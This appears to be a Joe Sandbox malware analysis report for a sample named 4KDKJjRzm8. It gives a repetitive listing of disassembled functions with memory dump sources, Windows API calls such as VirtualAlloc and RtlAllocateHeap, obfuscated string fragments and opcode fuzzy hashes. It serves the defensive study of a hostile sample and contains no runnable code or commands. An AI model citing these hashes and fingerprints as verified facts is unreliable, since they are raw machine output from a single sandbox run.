                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                                        • Opcode ID: 610f93a0d7428d9b955f56bc238a25eb5a5f22a2ce76856481d6353662835819
                                                                                                                                                                                                                                                        • Instruction ID: d6b8a8f69535dda3ac4e2c6df011cb28d52ac37385b293f60b86aa759b598048
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 610f93a0d7428d9b955f56bc238a25eb5a5f22a2ce76856481d6353662835819
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02D0C93286A222EBD6102F28BD19BC73B54EF59320F074892B4446A1B4C624EC91DAD0
                                                                                                                                                                                                                                                        Function 009BC55C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000), ref: 009BC561
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                        • Opcode ID: fc62ee5ae7695b326e13cc436f1d5875b6d87d6cf964a3db2395d3cf11f1422a
                                                                                                                                                                                                                                                        • Instruction ID: 801c4e9c967d4203352558adfc234d489da37db394ad480aa4dfca8e0c84d32f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc62ee5ae7695b326e13cc436f1d5875b6d87d6cf964a3db2395d3cf11f1422a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFA001711992109ADA562B24BC09B847B21AB68621F524192E101590B68661D892AA94
                                                                                                                                                                                                                                                        Function 009D95BD Relevance: 1.3, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000), ref: 009DA62C
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                        • Opcode ID: c3e860435373f4728f0fde069926733aeae396c43cc39d8f24d42cf1ecce427c
                                                                                                                                                                                                                                                        • Instruction ID: c5c597b6449620ea4061074ec49d365bd9cecfeb3e836597c90abdef6dc2028f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3e860435373f4728f0fde069926733aeae396c43cc39d8f24d42cf1ecce427c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FE06571508508CBC7066F38CC4835EB6E1EF94321F258A15DA9147B98E7774D68CA46
                                                                                                                                                                                                                                                        Function 009D9497 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                        • Opcode ID: db643939ced237b7ece6bd9493061a352ee659bcb2e6badcf9e2bffa321ff082
                                                                                                                                                                                                                                                        • Instruction ID: 69d05b6f4e17ed4986759419ea0be7188c77996e9811ab902538c673ff572b54
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db643939ced237b7ece6bd9493061a352ee659bcb2e6badcf9e2bffa321ff082
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92B092F441421ACACF086F3080092EE3A70EB00302F40052DAA4146B81E236087CCA49

                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                        Function 009A42D0 Relevance: 39.6, APIs: 2, Strings: 20, Instructions: 1129COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009A43AA
                                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009A443E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                        • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                                                                                                        • API String ID: 237503144-1429676654
                                                                                                                                                                                                                                                        • Opcode ID: 0df62c100b97aba66c0ddbb6a20786bf0f95b1bca22c38c90326b658c6ff8716
                                                                                                                                                                                                                                                        • Instruction ID: 121933d5d2106b7c2b1aefedda5c118bdd1ee4f25977a2e7be89aa0633e137ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0df62c100b97aba66c0ddbb6a20786bf0f95b1bca22c38c90326b658c6ff8716
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6C20CB560C3848AD334CF54C452B9FBAF2FBC2300F00892DD5E96B255D7B5864A9B9B
                                                                                                                                                                                                                                                        Function 009960E9 Relevance: 17.1, Strings: 13, Instructions: 807COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                                                                                                                                                                                                                        • API String ID: 0-2746398225
                                                                                                                                                                                                                                                        • Opcode ID: 7f4198d7728920980c30a491aaa3d490b246bdcef760f85711725f42fac059d5
                                                                                                                                                                                                                                                        • Instruction ID: 308531b467149cbe33e0a02680b6552b494141191a7227e6b3b5aa66a9f6f979
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f4198d7728920980c30a491aaa3d490b246bdcef760f85711725f42fac059d5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 374203B2A083518FDB248F28D8917ABB7E6FFD5314F19893CD4D98B256DB349805CB42
                                                                                                                                                                                                                                                        Function 00B4637A Relevance: 10.4, Strings: 7, Instructions: 1624COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: @[y$HCL0$PP$hwv$\s~$mh_$z
                                                                                                                                                                                                                                                        • API String ID: 0-1160070910
                                                                                                                                                                                                                                                        • Opcode ID: 50b45d0fc6ef67f683c65db6ef547220341d6845c3be021506524db46475d9b2
                                                                                                                                                                                                                                                        • Instruction ID: c7fe6704e80ec3bd6a716da64408c10e011df5eb056ce76ac6fea438db201ece
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50b45d0fc6ef67f683c65db6ef547220341d6845c3be021506524db46475d9b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CB218F360C2009FE704AE2DEC8567ABBE9EF94720F16463DEAC4D7744E63598018697
                                                                                                                                                                                                                                                        Function 009B88B0 Relevance: 10.3, Strings: 8, Instructions: 281COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: X$X$Y$Y$Z$Z$q$}
                                                                                                                                                                                                                                                        • API String ID: 0-540668698
                                                                                                                                                                                                                                                        • Opcode ID: 92023e53b11931f45d32f5ecdcf6ed19e405229557f51b4b8869f4eaeec5f576
                                                                                                                                                                                                                                                        • Instruction ID: 5c19ddc0aed927ea7e41f8c53da4b7b5357282c6bb200461b1b1dbb56d2552e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92023e53b11931f45d32f5ecdcf6ed19e405229557f51b4b8869f4eaeec5f576
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26A11B23E047E94ADF1189FC8D542EFAFA25B9A230F1D4769C4B1E73C2D5694902C761
                                                                                                                                                                                                                                                        Function 00B4E8D0 Relevance: 9.2, Strings: 6, Instructions: 1652COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !Q}1$(o$/6b#$fg'$kDL$myo
                                                                                                                                                                                                                                                        • API String ID: 0-3601029264
                                                                                                                                                                                                                                                        • Opcode ID: 27b133eeaa4235933b3d00111be82d8a03fb1869732275422adb6c86283ef9f5
                                                                                                                                                                                                                                                        • Instruction ID: 6371e15f3202e7c17b5c0bdd33b964dc914619db2e47cb0652a4188ba33b69a2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27b133eeaa4235933b3d00111be82d8a03fb1869732275422adb6c86283ef9f5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0B208F360C2009FE708AE2DEC8577ABBE9EF94320F16453DE6C5C7744EA3558058696
                                                                                                                                                                                                                                                        Function 00B3C31C Relevance: 7.8, Strings: 5, Instructions: 1563COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
